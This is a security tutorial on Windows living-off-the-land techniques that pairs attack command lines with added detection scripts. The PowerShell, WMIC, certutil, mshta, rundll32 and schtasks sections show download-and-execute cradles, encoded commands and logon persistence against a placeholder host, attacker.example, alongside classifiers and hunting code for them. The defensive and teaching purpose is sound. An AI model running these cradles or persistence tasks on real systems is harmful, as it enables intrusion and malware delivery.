# Living off the Land Attacks

Attackers abuse legitimate tools and services that are present on the victim device by default, such as PowerShell, WMIC, certutil, mshta, rundll32 and schtasks on Windows, to carry out malicious activity without dropping custom tooling that defences would otherwise flag. Because these binaries are signed and expected on every host, detection has to rest on how they are invoked (command line, parent process, network destination) rather than on what is running.

Below are a few examples of built-in Windows tools being abused in LOL attacks; they double as a red-team reference.

## PowerShell

```
PS C:\> powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
PS C:\> powershell -NoP -NonI -W Hidden -EncodedCommand SQBn...Base64...
PS C:\> powershell -NoP -NonI -Command "Invoke-WebRequest 'http://attacker.example/file.exe' -OutFile 'C:\Users\Public\updater.exe'; Start-Process 'C:\Users\Public\updater.exe'"
```

The first command fetches a script from a remote server and executes it directly in memory (`IEX` is an alias for `Invoke-Expression`) without writing it to disk. The second hides the payload in a base64 string passed to `-EncodedCommand`, which expects base64 of UTF-16LE text, so the command line shows no readable script. In the third, the file is downloaded to disk and then executed. The switches used throughout are `-NoP` (no profile), `-NonI` (non-interactive), `-W Hidden` (hidden window) and `-Exec Bypass` (ignore execution policy); the combination is a strong signal in process-creation logs, as is the `DownloadString`/`IEX` pair. Note that `-Exec Bypass` is not a security boundary: execution policy is a usability feature, not an access control, so its presence is a detection, not a privilege escalation.

## WMIC

WMIC (Windows Management Instrumentation Command-line) is the command-line front end to WMI and lets administrators manage local and remote systems. Threat actors abuse it to execute commands remotely: `/node:` with valid credentials reaches any host where WMI is accessible. WMIC is deprecated (since Windows 10 21H1) and is no longer installed by default on current Windows 11 releases, but the underlying WMI/CIM interface remains available through `Invoke-CimMethod` and `Invoke-WmiMethod`, so the technique outlives the binary.

```
PS C:\> wmic /node:TARGETHOST process call create "powershell -NoP -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
PS C:\> wmic /node:TARGETHOST process get name,commandline
PS C:\> wmic process call create "notepad.exe" /hidden
```

1. A new PowerShell process is created on `TARGETHOST` that downloads `payload.ps1` and executes it in memory. The process is spawned by the WMI provider host, so on the target it appears with `WmiPrvSE.exe` as its parent, a relationship worth alerting on.
2. Queries the remote system for its running processes and their command lines, returning structured output useful for reconnaissance across hosts.
3. The local `process call create` spawns `notepad.exe` on the same machine. The trailing `/hidden` is not a documented WMIC switch: `Win32_Process.Create` only controls the window through a `Win32_ProcessStartup` object with `ShowWindow` set, which WMIC's `call create` does not expose, so expect this argument to be rejected or ignored rather than to hide anything.
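Processes created through remote WMI land on the target with `WmiPrvSE.exe` as their parent, which gives the defender a simple live check. The function below is an added example, not code from the original article; it uses the CIM cmdlets that replace the deprecated `wmic.exe` and runs on the suspected target host.

```powershell
# Added example, not from the original article: on a suspected target host,
# list processes whose parent is WmiPrvSE.exe, the WMI provider host that
# executes Win32_Process.Create for remote "process call create" requests.
function Get-WmiSpawnedProcess {
    $all  = Get-CimInstance -ClassName Win32_Process
    $byId = @{}
    foreach ($p in $all) { $byId[[int]$p.ProcessId] = $p }
    foreach ($p in $all) {
        $parent = $byId[[int]$p.ParentProcessId]
        # PIDs are reused, so also require the parent to predate the child.
        if ($parent -and $parent.Name -ieq 'WmiPrvSE.exe' -and
            $parent.CreationDate -le $p.CreationDate) {
            [pscustomobject]@{
                ProcessId   = $p.ProcessId
                Name        = $p.Name
                Created     = $p.CreationDate
                CommandLine = $p.CommandLine
                ParentPid   = $parent.ProcessId
            }
        }
    }
}

Get-WmiSpawnedProcess | Format-Table -AutoSize -Wrap
```

This only sees processes that are still alive. For historical data use Security event 4688 (with "Include command line in process creation events" enabled) or Sysmon event 1, both of which record the parent image, and filter on `WmiPrvSE.exe`. On the attacker's source host the lateral movement shows up the other way round: a 4688 for `wmic.exe` whose command line carries `/node:`.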

## Certutil

Built for certificate management, but its `-urlcache` and `-encode`/`-decode` options make it a convenient downloader and base64 codec that needs no extra tooling.

```
PS C:\> certutil -urlcache -split -f "http://attacker.example/payload.exe" C:\Users\Public\payload.exe
PS C:\> certutil -decode C:\Users\Public\encoded.b64 C:\Users\Public\decoded.exe
PS C:\> certutil -encode C:\Users\Public\payload.exe C:\Users\Public\payload.b64
```

1. Downloads `payload.exe` to the victim device. `-urlcache -split -f` fetches the URL through the WinINet cache and writes the file to the given path; the fetch also leaves an entry in the user's URL cache, which `certutil -urlcache` (with no further arguments) lists, so the download leaves a forensic trace beyond the file itself.
2. Decodes the base64 data in `encoded.b64` and writes the binary to `decoded.exe`, the usual final step after a payload has been smuggled in as text.
3. Encodes the exe to base64 inside a PEM-style `-----BEGIN CERTIFICATE-----` wrapper so it can pass filters that look for executables in transit. The encoding does nothing to evade endpoint detection once decoded, and the certutil command line itself is a common detection.
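Because `certutil -encode` wraps its output in certificate armor, a staged payload looks like a PEM certificate until it is decoded. The scanner below is an added example, not code from the original article: it finds armored files that decode to an `MZ` header. The fixture it builds (a fake executable consisting of an `MZ` header and padding, written to a `lol-certutil-demo` directory under the temp path) is constructed here so the example runs offline; the directory name and the fixture are assumptions, not artifacts from the page.

```powershell
# Added example, not from the original article: certutil -encode wraps its
# base64 output in PEM-style certificate armor, so a "certificate" file that
# decodes to an MZ header is a staged executable waiting for certutil -decode.
function Find-CertutilEncodedPe {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $lines = @(Get-Content -LiteralPath $_.FullName -TotalCount 200 -ErrorAction SilentlyContinue)
        if (-not $lines -or $lines[0] -ne '-----BEGIN CERTIFICATE-----') { return }
        # certutil writes 64-character lines, so a truncated body still decodes.
        $body = ($lines | Where-Object { $_ -notmatch '^-----' }) -join ''
        try { $bytes = [Convert]::FromBase64String($body) } catch { return }
        if ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A) {
            [pscustomobject]@{ File = $_.FullName; DecodedBytes = $bytes.Length; Modified = $_.LastWriteTime }
        }
    }
}

# Constructed fixture (assumption, not from the page): a fake "executable" (MZ
# header plus padding) armored the way certutil -encode writes it, beside a
# PEM-looking file that decodes to DER-style bytes so the scanner has
# something to ignore.
$dir = Join-Path ([IO.Path]::GetTempPath()) 'lol-certutil-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
function Write-Armored([string]$File, [byte[]]$Bytes) {
    $b64 = [Convert]::ToBase64String($Bytes)
    $wrapped = ($b64 -split '(.{64})' | Where-Object { $_ }) -join "`r`n"
    @('-----BEGIN CERTIFICATE-----', $wrapped, '-----END CERTIFICATE-----') | Set-Content -LiteralPath $File
}
$fakePe = New-Object byte[] 302; $fakePe[0] = 0x4D; $fakePe[1] = 0x5A
$fakeDer = New-Object byte[] 104; $fakeDer[0] = 0x30; $fakeDer[1] = 0x82
Write-Armored (Join-Path $dir 'payload.b64') $fakePe
Write-Armored (Join-Path $dir 'harmless.cer') $fakeDer

Find-CertutilEncodedPe -Path $dir    # reports payload.b64 only
```

Point it at `C:\Users\Public`, `%TEMP%`, `ProgramData` and similar user-writable locations, where staged payloads usually sit. The check keys on the armor header rather than the file extension because the attacker chooses the name.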

## MSHTA

`mshta.exe` runs HTML Application (HTA) files, which can contain VBScript or JScript that executes with the privileges of the current user, outside any browser sandbox.

```
PS C:\> mshta "http://attacker.example/payload.hta"
PS C:\> mshta "javascript:var s=new ActiveXObject('WScript.Shell');s.Run('powershell -NoP -NonI -W Hidden -Command Start-Process calc.exe');close();"
PS C:\> mshta "C:\Users\Public\malicious.hta"
```

1. Loads the HTA from a remote server and executes its content in the context of the logged-on user; nothing needs to be written to disk first.
2. MSHTA is passed an inline `javascript:` URI that creates a **WScript.Shell** ActiveX object and uses it to run **PowerShell**, which then starts a process. This shows how inline script can spawn system commands without any saved intermediary file; the whole payload sits in the `mshta` command line, which is also where it can be detected.
3. Runs a local HTA file, the form typically used after a phishing attachment or download has dropped `malicious.hta` into a user-writable directory.

## Rundll32

Executes exported functions from DLLs. Because `rundll32.exe` is a signed Microsoft binary, the attacker's code runs under its name and process image.

```
PS C:\> rundll32.exe C:\Users\Public\backdoor.dll,Start
PS C:\> rundll32.exe url.dll,FileProtocolHandler "http://attacker.example/update.html"
PS C:\> rundll32.exe C:\Windows\Temp\loader.dll,Run
```

1. Loads the specified **DLL** and calls its exported `Start` function, which runs the DLL's code inside the `rundll32.exe` process.
2. **rundll32** invokes the built-in `url.dll` with its **FileProtocolHandler** export and a remote URL, causing the system's default handler for that URL to process the remote content, which can bootstrap further activity.
3. The third **rundll32** command calls a crafted export in a temporary **DLL**, which may execute embedded loader logic or shellcode from a file placed in a writable location. In both the first and third cases the tell is a DLL loaded from a user-writable path (`C:\Users\Public`, `C:\Windows\Temp`) rather than from `System32`.
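The PowerShell, MSHTA and Rundll32 sections above all come down to a handful of command-line patterns, so one classifier serves all three. The code below is an added example, not from the original article: it decodes any `-EncodedCommand` payload, then applies per-binary rules to the command line and the decoded text. The sample command lines are constructed from the page's examples plus two benign administrative invocations; in practice feed the function the `CommandLine` field of Security 4688 or Sysmon event 1 records. The rule names, the `-EncodedCommand` abbreviations handled and the benign samples are assumptions for illustration.

```powershell
# Added example, not from the original article: classify process command lines
# for the PowerShell, MSHTA and Rundll32 abuse patterns shown above. Sample
# input is constructed; real input is the CommandLine of 4688 / Sysmon 1 events.

function Expand-EncodedCommand {
    # -EncodedCommand (abbreviable to -e, -ec, -enc) carries base64 of UTF-16LE
    # text; return the decoded script, or $null when the switch is absent.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?i)\s-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

# Each rule names the binary it applies to (regex on the image name without
# path or .exe) and a regex evaluated against the command line plus any decoded
# -EncodedCommand payload. -match is case-insensitive in PowerShell.
$Rules = @(
    @{ Name = 'PS download cradle';        Bin = 'powershell|pwsh'; Match = 'DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer' }
    @{ Name = 'PS in-memory exec';         Bin = 'powershell|pwsh'; Match = '\bIEX\b|Invoke-Expression|FromBase64String' }
    @{ Name = 'PS hidden/bypass';          Bin = 'powershell|pwsh'; Match = '-W(indowStyle)?\s+Hidden|-Exec(utionPolicy)?\s+Bypass' }
    @{ Name = 'PS encoded command';        Bin = 'powershell|pwsh'; Match = '\s-e(c|nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}' }
    @{ Name = 'MSHTA remote HTA';          Bin = 'mshta';           Match = 'https?://' }
    @{ Name = 'MSHTA inline script';       Bin = 'mshta';           Match = '(javascript|vbscript):' }
    @{ Name = 'MSHTA user-writable HTA';   Bin = 'mshta';           Match = '(Users\\Public|Temp|AppData|ProgramData)\\[^"]*\.hta' }
    @{ Name = 'Rundll32 user-writable DLL'; Bin = 'rundll32';       Match = '(Users\\Public|Temp|AppData|ProgramData)\\[^,"\s]*\.dll\s*,' }
    @{ Name = 'Rundll32 url.dll handler';  Bin = 'rundll32';        Match = 'url\.dll\s*,\s*FileProtocolHandler' }
)

function Test-LolBinCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Image name: first token, quoted or not, with directory and .exe stripped.
    $first = if ($CommandLine -match '^\s*"([^"]+)"|^\s*(\S+)') {
        if ($Matches[1]) { $Matches[1] } else { $Matches[2] }
    } else { '' }
    $bin = ($first -replace '^.*\\' -replace '\.exe$').ToLower()
    $decoded = if ($bin -in @('powershell', 'pwsh')) { Expand-EncodedCommand $CommandLine } else { $null }
    $text = if ($decoded) { $CommandLine + "`n" + $decoded } else { $CommandLine }
    $hits = foreach ($r in $Rules) {
        if ($bin -match "^($($r.Bin))$" -and $text -match $r.Match) { $r.Name }
    }
    [pscustomobject]@{
        Binary      = $bin
        Rules       = @($hits)
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed samples: the page's command lines plus two benign administrative uses.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"))
$Samples = @(
    "powershell -NoP -NonI -W Hidden -EncodedCommand $encoded"
    "powershell -NoP -NonI -Command `"Invoke-WebRequest 'http://attacker.example/file.exe' -OutFile 'C:\Users\Public\updater.exe'; Start-Process 'C:\Users\Public\updater.exe'`""
    'mshta "http://attacker.example/payload.hta"'
    'mshta "javascript:var s=new ActiveXObject(''WScript.Shell'');s.Run(''calc.exe'');close();"'
    'C:\Windows\System32\rundll32.exe C:\Users\Public\backdoor.dll,Start'
    'rundll32.exe url.dll,FileProtocolHandler "http://attacker.example/update.html"'
    'powershell -NoProfile -Command Get-Service'
    'rundll32.exe shell32.dll,Control_RunDLL'
)
$Samples | ForEach-Object { Test-LolBinCommandLine $_ } | Format-List Binary, Rules, Decoded, CommandLine
```

The encoded sample is flagged four times (encoded command, hidden window, download cradle and in-memory execution), the last two only because the payload was decoded first; matching on the raw command line alone would miss them. The two benign samples produce an empty `Rules` list. For script content that never appears on a command line, PowerShell script block logging (event 4104 in `Microsoft-Windows-PowerShell/Operational`) captures the decoded text directly and can be fed through the same rules.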

## Scheduled Tasks (schtasks)

Lets administrators run programs or scripts at specified times, on events such as logon, or on a repeating schedule. Attackers use it for persistence, for running a payload on demand, and, when they already hold administrative rights, for running it as SYSTEM via `/RU SYSTEM`.

```
PS C:\> schtasks /Create /SC ONLOGON /TN "WindowsUpdate" /TR "powershell -NoP -NonI -Exec Bypass -Command IEX((New-Object Net.WebClient).DownloadString('http://attacker.example/ps1'))"
PS C:\> schtasks /Create /SC DAILY /TN "DailyJob" /TR "powershell -NoP -NonI -Exec Bypass -File C:\Users\Public\encrypt.ps1" /ST 00:05
PS C:\> schtasks /Run /TN "WindowsUpdate"
```

1. A `WindowsUpdate` task (the name mimics a legitimate component) is created that runs PowerShell at every user logon to download and execute a remote script. The persistence survives reboots and re-fetches the payload each time, so nothing malicious needs to stay on disk.
2. A daily task, the equivalent of a Linux cron job, runs `encrypt.ps1` at 00:05 through `powershell -File`; the Task Scheduler does not execute a `.ps1` action on its own, since the default handler for that extension is Notepad.
3. The attacker triggers the named task immediately, invoking its configured action on demand without waiting for the trigger.
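Scheduled tasks are also where the MSHTA, Rundll32 and PowerShell tricks above get parked for persistence, so a task hunt covers all of them at once. The function below is an added example, not code from the original article: it enumerates every task action that launches one of the binaries discussed on this page and flags those whose command line also carries a download or inline-script pattern. It needs the `ScheduledTasks` module (Windows 8 / Server 2012 and later) and should be run elevated to see tasks registered by other accounts; the binary list and cradle regex are assumptions chosen for illustration.

```powershell
# Added example, not from the original article: find scheduled tasks whose
# action runs a LOLBin and highlight the ones that look like download cradles.
$LolBinPattern = '(?i)(^|\\|")(powershell|pwsh|mshta|rundll32|wmic|certutil|regsvr32|cmd|wscript|cscript)(\.exe)?(\s|"|$)'
$CradlePattern = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression|\s-e(c|nc|ncoded|ncodedcommand)?\s|FromBase64String|-W(indowStyle)?\s+Hidden|https?://|javascript:|vbscript:)'

function Find-LolBinScheduledTask {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # COM-handler actions carry a ClassId instead of an Execute path.
            if (-not $action.Execute) { continue }
            $cmd = (@($action.Execute, $action.Arguments) -join ' ').Trim()
            if ($cmd -notmatch $LolBinPattern) { continue }
            $info = $task | Get-ScheduledTaskInfo
            [pscustomobject]@{
                Task     = $task.TaskPath + $task.TaskName
                State    = $task.State
                RunAs    = $task.Principal.UserId
                Triggers = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task' }) -join ','
                Cradle   = [bool]($cmd -match $CradlePattern)
                LastRun  = $info.LastRunTime
                Author   = $task.Author
                Command  = $cmd
            }
        }
    }
}

Find-LolBinScheduledTask | Sort-Object Cradle -Descending | Format-Table -AutoSize -Wrap
```

Expect legitimate hits (Windows and vendor tasks routinely run `powershell` or `rundll32`); the `Cradle` column, a `RunAs` of SYSTEM for a task authored by an ordinary user, and a `LogonTrigger` on a task with a generic name like `WindowsUpdate` are what separate the examples on this page from the noise. Task creation itself is logged as Security event 4698 (when "Other Object Access Events" auditing is on) and as event 106 in `Microsoft-Windows-TaskScheduler/Operational`, which catches the `schtasks /Create` step rather than the later execution.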
